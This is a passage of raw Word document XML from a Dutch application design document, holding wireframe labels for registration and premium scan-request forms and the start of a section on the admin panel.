                <wp:docPr id="506" name="Rounded Rectangle 506"/>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6AA3CB" id="Rounded Rectangle 506" o:spid="_x0000_s1026" style="position:absolute;margin-left:599.3pt;margin-top:285.9pt;width:30pt;height:9pt;z-index:25243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7200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60AAAC6C" wp14:editId="71A34392">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4751705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2828290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1586865" cy="568325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="553" name="Text Box 553"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1586865" cy="56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5060A" w14:textId="72BBDBE1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Beschrijving van standaard aanvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A87BF23" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="003B15E4" w:rsidRDefault="002A0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AC6C" id="Text Box 553" o:spid="_x0000_s1084" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:374.15pt;margin-top:222.7pt;width:124.95pt;height:4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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0395060A" w14:textId="72BBDBE1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Beschrijving van standaard aanvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A87BF23" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="003B15E4" w:rsidRDefault="002A05E5"/>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4912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D9B3511" wp14:editId="6D4DF83F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4819164</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2826273</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2031813" cy="2839"/>
                <wp:effectExtent l="0" t="0" r="26035" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="526" name="Straight Connector 526"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2031813" cy="2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65AEBB" id="Straight Connector 526" o:spid="_x0000_s1026" style="position:absolute;flip:x y;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5pt,222.55pt" to="539.45pt,2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2384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CB9D2CB" wp14:editId="7031DE72">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6851650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2482215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21943"/>
                    <wp:lineTo x="21600" y="21943"/>
                    <wp:lineTo x="21600"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143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6DD34" id="Rectangle 503" o:spid="_x0000_s1026" style="position:absolute;margin-left:539.5pt;margin-top:195.45pt;width:90pt;height:63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8048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BAAF674" wp14:editId="2211BEF1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6527800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2254250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="2171700"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21726"/>
                    <wp:lineTo x="21760" y="21726"/>
                    <wp:lineTo x="21760"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3FCC0" id="Rectangle 52" o:spid="_x0000_s1026" style="position:absolute;margin-left:514pt;margin-top:177.5pt;width:135pt;height:171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rqxJ0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89728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31377E69" wp14:editId="5FFB6C01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4939030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1686560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1271905" cy="227965"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="47" name="Text Box 47"/>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784AE" w14:textId="17A4BF1D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0013029C">
                            <w:r>
                              <w:t>Registr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7E69" id="Text Box 47" o:spid="_x0000_s1085" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:388.9pt;margin-top:132.8pt;width:100.15pt;height:17.9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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="119784AE" w14:textId="17A4BF1D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0013029C">
                      <w:r>
                        <w:t>Registrere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87680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28AF8E1B" wp14:editId="56DF06FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5005892</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1686672</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2596141" cy="1345"/>
                <wp:effectExtent l="0" t="0" r="20320" b="49530"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="Straight Connector 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2596141" cy="1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C3F593" id="Straight Connector 44" o:spid="_x0000_s1026" style="position:absolute;flip:x y;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132.8pt" to="598.55pt,1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2864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2533C032" wp14:editId="6B3224EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5007797</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1342988</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1841500" cy="0"/>
                <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="525" name="Straight Connector 525"/>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023DB" id="Straight Connector 525" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:252452864;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="394.3pt,105.75pt" to="539.3pt,1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6176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40862B89" wp14:editId="3446E9EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4942840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1340485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1459230" cy="34099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145923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C5ACF" w14:textId="0285DE5D" w:rsidR="002A05E5" w:rsidRPr="000A1B8C" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rP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2B89" id="Text Box 549" o:spid="_x0000_s1086" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:389.2pt;margin-top:105.55pt;width:114.9pt;height:26.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="38CC5ACF" w14:textId="0285DE5D" w:rsidR="002A05E5" w:rsidRPr="000A1B8C" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alternatieve e-mailadres</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5152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06A64849" wp14:editId="364501D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4943475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>771525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="228600"/>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FE659" w14:textId="771484F4" w:rsidR="002A05E5" w:rsidRPr="00211DCB" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Bedri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64849" id="Text Box 548" o:spid="_x0000_s1087" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:389.25pt;margin-top:60.75pt;width:75pt;height:18pt;z-index:2524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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25FFE659" w14:textId="771484F4" w:rsidR="002A05E5" w:rsidRPr="00211DCB" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Bedrijf</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0816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06EDE871" wp14:editId="0A756318">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4944297</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>767454</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1841500" cy="0"/>
                <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="523" name="Straight Connector 523"/>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C98B1" id="Straight Connector 523" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:252450816;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="389.3pt,60.45pt" to="534.3pt,6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4128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4094EACE" wp14:editId="060BF113">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4942840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>316230</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="223520"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="543" name="Text Box 543"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="114300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B0FA2" w14:textId="2A73B159" w:rsidR="002A05E5" w:rsidRPr="00211DCB" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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4EACE" id="Text Box 543" o:spid="_x0000_s1088" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:389.2pt;margin-top:24.9pt;width:90pt;height:17.6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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4BFB0FA2" w14:textId="2A73B159" w:rsidR="002A05E5" w:rsidRPr="00211DCB" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Naam</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48768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CAF9225" wp14:editId="0E06FB3E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4943027</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>310328</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1841500" cy="0"/>
                <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="521" name="Straight Connector 521"/>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90F83" id="Straight Connector 521" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:252448768;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="389.2pt,24.45pt" to="534.2pt,2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3408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59949A48" wp14:editId="69540C0E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>7609840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1687195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="381000" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="24000"/>
                    <wp:lineTo x="21600" y="24000"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="505" name="Rounded Rectangle 505"/>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495F3" id="Rounded Rectangle 505" o:spid="_x0000_s1026" style="position:absolute;margin-left:599.2pt;margin-top:132.85pt;width:30pt;height:9pt;z-index:25243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&#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30336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16E7CA83" wp14:editId="3708E3F0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6851015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1221740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="482" name="Rectangle 48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6A7BD" id="Rectangle 482" o:spid="_x0000_s1026" style="position:absolute;margin-left:539.45pt;margin-top:96.2pt;width:90pt;height:1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HCn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1360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33B83335" wp14:editId="29D7A362">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6724650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>993140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397000" cy="914400"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="487" name="Rectangle 487"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="13970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977F4" id="Rectangle 487" o:spid="_x0000_s1026" style="position:absolute;margin-left:529.5pt;margin-top:78.2pt;width:110pt;height:1in;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8288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A264CAB" wp14:editId="163C2EB0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6787515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>656590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="475" name="Rectangle 475"/>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3E391" id="Rectangle 475" o:spid="_x0000_s1026" style="position:absolute;margin-left:534.45pt;margin-top:51.7pt;width:90pt;height:18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6240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A672435" wp14:editId="3E403F4B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6786245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>200025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="473" name="Rectangle 47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DC245" id="Rectangle 473" o:spid="_x0000_s1026" style="position:absolute;margin-left:534.35pt;margin-top:15.75pt;width:90pt;height:18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6000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C222A77" wp14:editId="2B64B02C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6526941</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="2171700"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21726"/>
                    <wp:lineTo x="21760" y="21726"/>
                    <wp:lineTo x="21760"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915DA" id="Rectangle 51" o:spid="_x0000_s1026" style="position:absolute;margin-left:513.95pt;margin-top:0;width:135pt;height:171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WAZw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4976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EB1C07C" wp14:editId="2630701F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-719418</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="7662134"/>
                <wp:effectExtent l="0" t="0" r="38100" b="34290"/>
                <wp:wrapNone/>
                <wp:docPr id="13" name="Rectangle 13"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="7662134"/>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B4071" id="Rectangle 13" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.75pt;margin-top:-56.6pt;width:25pt;height:603.3pt;z-index:-25090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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DB2EEE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252425216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63B25099" wp14:editId="0CEF1FA5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5000625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2221230" cy="1599565"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="472" name="Text Box 472"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2221230" cy="159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F7615" w14:textId="6AD38645" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00C406BD">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanvraag scan (Premium)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4FD2E7F9" w14:textId="130B6887" w:rsidR="002A05E5" w:rsidRPr="00B568D8" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Met het premium aanvraagformulier kunnen gebruikers kiezen uit een combinatie van een scan optie en rapport optie. Een gebruiker kan ook een alternatieve naam en emailadres meegeven die eenmalig wordt gebrui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5099" id="Text Box 472" o:spid="_x0000_s1089" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-10.85pt;margin-top:393.75pt;width:174.9pt;height:125.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3FAF7615" w14:textId="6AD38645" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00C406BD">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Aanvraag scan (Premium)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4FD2E7F9" w14:textId="130B6887" w:rsidR="002A05E5" w:rsidRPr="00B568D8" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Met het premium aanvraagformulier kunnen gebruikers kiezen uit een combinatie van een scan optie en rapport optie. Een gebruiker kan ook een alternatieve naam en emailadres meegeven die eenmalig wordt gebruikt.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3B3AD" w14:textId="77777777" w:rsidR="00E85184" w:rsidRPr="00A754AF" w:rsidRDefault="00E85184" w:rsidP="00A754AF">
      <w:pPr>
        <w:sectPr w:rsidR="00E85184" w:rsidRPr="00A754AF" w:rsidSect="0096760D">
          <w:headerReference w:type="first" r:id="rId55"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2818DE" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D" w:rsidP="00B568D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6354E118" w14:textId="2EF5C96D" w:rsidR="00B568D8" w:rsidRDefault="008A4128" w:rsidP="00B568D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252493824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C44663D" wp14:editId="00740BDF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903007</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-895387</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="524" name="Rectangle 52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923A7" id="Rectangle 524" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.1pt;margin-top:-70.45pt;width:25pt;height:1031.7pt;z-index:-25082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UHb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yZQ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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B568D8">
        <w:t>4.3 Admin Paneel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C580A16" w14:textId="18AD1046" w:rsidR="00DD4D16" w:rsidRDefault="00DD4D16"/>
    <w:p w14:paraId="42FF73D0" w14:textId="3D4C3759" w:rsidR="004756DF" w:rsidRDefault="00C819BF">
      <w:r>
        <w:t>Het doel van de admin panee</w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t>l is om het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruikersbestand te onderhouden. De administrator kan met de admin paneel data over de geregistreerde gebruikersaccounts ophalen in een tabel en deze upgraden naar premium. Ook kan er data over de gegenereerde rapporten opgehaald worden, mocht er een rapport niet succesvol verstuurd zijn kan dat via de admin paneel nogmaals gedaan worden.</w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t xml:space="preserve"> Ook beschikt de admin paneel ove</w:t>
      </w:r>
      <w:r w:rsidR="0031747F">
